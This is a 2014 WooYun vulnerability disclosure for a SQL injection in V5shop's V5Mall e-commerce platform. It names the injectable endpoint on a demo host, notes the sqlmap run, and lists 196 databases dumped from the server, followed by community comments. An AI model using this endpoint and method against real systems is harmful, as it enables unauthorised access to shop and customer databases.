当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-047999

漏洞标题:V5shop旗下V5Mall多用户商城存在SQL注入漏洞

相关厂商:V5shop

漏洞作者: PgHook

提交时间:2014-01-06 11:07

修复时间:2014-04-03 11:08

公开时间:2014-04-03 11:08

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-01-06: 细节已通知厂商并且等待厂商处理中
2014-01-11: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2014-03-07: 细节向核心白帽子及相关领域专家公开
2014-03-17: 细节向普通白帽子公开
2014-03-27: 细节向实习白帽子公开
2014-04-03: 细节向公众公开

简要描述:

@V5shop 这次应该不会出差去了吧!

详细说明:

测试的漏洞站点:http://tdemo002mp.v5portal.com/

v1.jpg


漏洞页面:http://tdemo002mp.v5portal.com/member/groupbuy.ashx?id=1
简单的加个’

v2.jpg


上sqlmap跑下

v3.jpg

漏洞证明:

available databases [196]:                                                                                                                          
[*] 021web.com.cn
[*] baby1_v5shop_com_cn
[*] batteryface.com
[*] book1_v5shop_com_cn
[*] Books
[*] boon365.v5shop.com.cn
[*] chinee.cn
[*] clothes2.v5shop.com.cn
[*] clothes3_v5shop_com_cn
[*] clothes4_v5shop_com_cn
[*] clothes_v5shop_com_cn
[*] common10_v5shop_com_cn
[*] common11_v5shop_com_cn
[*] common12_v5shop_com_cn
[*] common13_com
[*] common14_v5shop
[*] common15.v5shop.com.cn
[*] common16_v5shop_com_cn
[*] common17_v5shop_com_cn
[*] common18.v5shop
[*] common19.v5shop
[*] common20.v5shop.com.cn
[*] common21.v5shop.com.cn
[*] common22.v5shop.com.cn
[*] common23.v5shop.com.cn
[*] common24.v5shop.com.cn
[*] common25.v5shop.com.cn
[*] common28.v5shop.com.cn
[*] common2_v5shop_com_cn
[*] common3_v5shop_com_cn
[*] common4_v5shop_com_cn
[*] common5.v5shop.com.cn
[*] common7_v5shop_com_cn
[*] common8_v5shop_com_cn
[*] common9.v5shop.com.cn
[*] common_v5shop_com_cn
[*] company10.v5shop.com.cn
[*] company11_v5shop_com_cn
[*] company12_v5shop_com_cn
[*] company2.v5shop.com.cn
[*] company3.v5shop.com.cn
[*] company4.v5shop.com.cn
[*] company5_v5shop_com_cn
[*] company7_v5shop_com_cn
[*] company8_v5shop_com_cn
[*] company9.v5shop.com.cn
[*] company_v5shop_com_cn
[*] cuckoomall_com_cn
[*] db6001
[*] db6002
[*] db6003
[*] db6014
[*] db6066
[*] db6067
[*] db6068
[*] db6069
[*] db6070
[*] db6071
[*] db6072
[*] db6073
[*] db6074
[*] demo.v5shop.com.cn
[*] ds201
[*] e-common01.v5shop.com.cn
[*] e-common02.v5shop.com.cn
[*] e-common1
[*] enterprise.v5shop.com.cn
[*] enterprise02v5shop
[*] enterprise04
[*] flower_v5shop_com_cn
[*] hichina.v5shop.com.cn
[*] hsg168v5shop
[*] istation.so
[*] jewelry1_v5shop_com_cn
[*] light1_v5shop_com_cn
[*] liyalisa.com
[*] manyshop
[*] master
[*] mini66v5shop
[*] moban.v5shop.com.cn
[*] model
[*] msdb
[*] multilingual.v5shop.com.cn
[*] ndt360.net
[*] pinyou100.y0543.com
[*] sex_v5shop_com_cn
[*] skin000vs.v5shop.com.cn
[*] skin001vi.v5shop.com.cn
[*] skin002vi.v5shop.com.cn
[*] skin003vi.v5shop.com.cn
[*] skin004vi.v5shop.com.cn
[*] skin005vi.v5shop.com.cn
[*] soft.v5shop.com.cn
[*] soft1.v5shop.net2
[*] taokebao.v5shop.com.cn
[*] taokebao.v5shop.com2
[*] tdemo0010ct.v5shop.com.cn
[*] tdemo001ct.v5shop.com.cn
[*] tdemo002ct.v5shop.com.cn
[*] tdemo002vcc.v5shop.com.cn
[*] tdemo003ct.v5shop.com.cn
[*] tdemo003lj.v5shop.com.cn
[*] tdemo003mp.v5shop.com.cn
[*] tdemo003vcc.v5shop.com.cn
[*] tdemo004ct.v5shop.com.cn
[*] tdemo004mp.v5shop.com.cn
[*] tdemo004vcc.v5shop.com.cn
[*] tdemo005ct.v5shop.com.cn
[*] tdemo005mp.v5shop.com.cn
[*] tdemo005vcc.v5shop.com.cn
[*] tdemo006ct.v5shop.com.cn
[*] tdemo006vj.v5shop.com.cn
[*] tdemo007ct.v5shop.com.cn
[*] tdemo007vcc.v5shop.com.cn
[*] tdemo008ct.v5shop.com.cn
[*] tdemo008vcc.v5shop.com.cn
[*] tdemo009ct.v5shop.com.cn
[*] tdemo009vcc.v5shop.com.cn
[*] tdemo010ct.v5shop.com.cn
[*] tdemo010vca.v5shop.com.cn
[*] tdemo011ct.v5shop.com.cn
[*] tdemo011vca.v5shop.com.cn
[*] tdemo012ct.v5shop.com.cn
[*] tdemo013ct.v5shop.com.cn
[*] tdemo013vcc.v5shop.com.cn
[*] tdemo014ct.v5shop.com.cn
[*] tdemo014vj.v5shop.com.cn
[*] tdemo015ct.v5shop.com.cn
[*] tdemo015vj.v5shop.com.cn
[*] tdemo016vj.v5shop.com.cn
[*] tdemo017vj.v5shop.com.cn
[*] tdemo018vj.v5shop.com.cn
[*] tdemo019vj.v5shop.com.cn
[*] tdemo020vcc.v5shop.com.cn
[*] tdemo021vj.v5shop.com.cn
[*] tdemo022vca.v5shop.com.cn
[*] tdemo023vcc.v5shop.com.cn
[*] tdemo024vca.v5shop.com.cn
[*] tdemo025vca.v5shop.com.cn
[*] tdemo026vcc.v5shop.com.cn
[*] tdemo027vca.v5shop.com.cn
[*] tdemo028vcc.v5shop.com.cn
[*] tdemo029vca.v5shop.com.cn
[*] tdemo030vca.v5shop.com.cn
[*] tdemo031vcc.v5shop.com.cn
[*] tdemo032vcc.v5shop.com.cn
[*] tdemo033vcb.v5shop.com.cn
[*] tdemo034vcc.v5shop.com.cn
[*] tdemo035vcc.v5shop.com.cn
[*] tdemo036vca.v5shop.com.cn
[*] tdemo037vca.v5shop.com.cn
[*] tdemo038vcc.v5shop.com.cn
[*] tdemo039vca.v5shop.com.cn
[*] tdemo040vcc.v5shop.com.cn
[*] tdemo041vj.v5shop.com.cn
[*] tdemo042vj.v5shop.com.cn
[*] tdemo043vcd.v5shop.com.cn
[*] tdemo044vcd.v5shop.com.cn
[*] tdemo045vcd.v5shop.com.cn
[*] tdemo046vcd.v5shop.com.cn
[*] tdemo047vcd.v5shop.com.cn
[*] tdemo048vcd.v5shop.com.cn
[*] tdemo049vca.v5shop.com.cn
[*] tdemo050vj.v5shop.com.cn
[*] tdemo051vcd.v5shop.com.cn
[*] tdemo052vcd.v5shop.com.cn
[*] tdemo053vcd.v5shop.com.cn
[*] tdemo054vcd.v5shop.com.cn
[*] tdemo055vcd.v5shop.com.cn
[*] tdemo056vcd.v5shop.com.cn
[*] tdemo057vcd.v5shop.com.cn
[*] tdemo058vcd.v5shop.com.cn
[*] tdemo059vcd.v5shop.com.cn
[*] tdemo060vcd.v5shop.com.cn
[*] tdemo061vcd.v5shop.com.cn
[*] tdemo062vcd.v5shop.com.cn
[*] tdemo063vcd.v5shop.com.cn
[*] tdemo064vcd.v5shop.com.cn
[*] tdemo065vcd.v5shop.com.cn
[*] tempdb
[*] ultraqua.cn
[*] v5mall.v5shop.com.cn
[*] v5mall02.v5shop.com.cn
[*] v5mall03.v5shop.com.cn
[*] xieyijiao.com
[*] xw188v5shop
[*] xwzbaby_com
[*] yfx.v5shop.com.cn
[*] yqt001.v5shop.com.cn
[*] yqt002.v5shop.com.cn
[*] yqt003.v5shop.com.cn
[*] yqt004.v5shop.com.cn
[*] yqt005.v5shop.com.cn
[*] yqt006.v5shop.com.cn
[*] zhouy.y0543.com
[*] 快乐购商城.com

修复方案:

。。。。

版权声明:转载请注明来源 PgHook@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-04-03 11:08

厂商回复:

漏洞Rank:11 (WooYun评价)

最新状态:

2014-01-19:各位白帽子对不起,没有及时的处理!最近事务比较忙


漏洞评价:

评论

  1. 2014-01-06 11:10 | saline ( 普通白帽子 | Rank:231 漏洞数:32 | Focus On Web Secur1ty)

    mark

  2. 2014-01-06 11:53 | 剑无名 ( 普通白帽子 | Rank:146 漏洞数:32 | 此剑无名。)

    我就想不通了。为啥我的就走小厂商?还有一个没审核@疯狗 @xsser

  3. 2014-01-06 11:59 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @剑无名 ... 仔细想想

  4. 2014-01-06 12:07 | 剑无名 ( 普通白帽子 | Rank:146 漏洞数:32 | 此剑无名。)

    @xsser 想过了啊,确认修复过了的啊,即使没修复。那我报搜索框的注入总没人提出来吧,何况你看下以前这个网站下面的评论都是说修复了。承认失误还能开心玩耍

  5. 2014-01-06 12:08 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @剑无名 ... 他这个是通用程序 你这个是他一个网站的 不一起玩耍了

  6. 2014-01-06 12:13 | 剑无名 ( 普通白帽子 | Rank:146 漏洞数:32 | 此剑无名。)

    @xsser 我错了,肥皂捡起来。

  7. 2014-01-06 13:32 | k0n9 ( 路人 | Rank:0 漏洞数:2 | 关注安全关注互联网)

    上次发一个直接进后台没有验证的,结果都去旅游了,这次的是不是都出出差了阿

  8. 2014-01-06 14:18 | 小驴牙牙 ( 普通白帽子 | Rank:168 漏洞数:43 | 不断学习,进步!)

    @剑无名 唉,应该直接提交一个通用,后悔了吧!

  9. 2014-01-11 14:30 | PgHook ( 普通白帽子 | Rank:964 漏洞数:115 | ...........................................)

    o(︶︿︶)o 唉!v5又出差去了,@疯狗 给补两wb吧!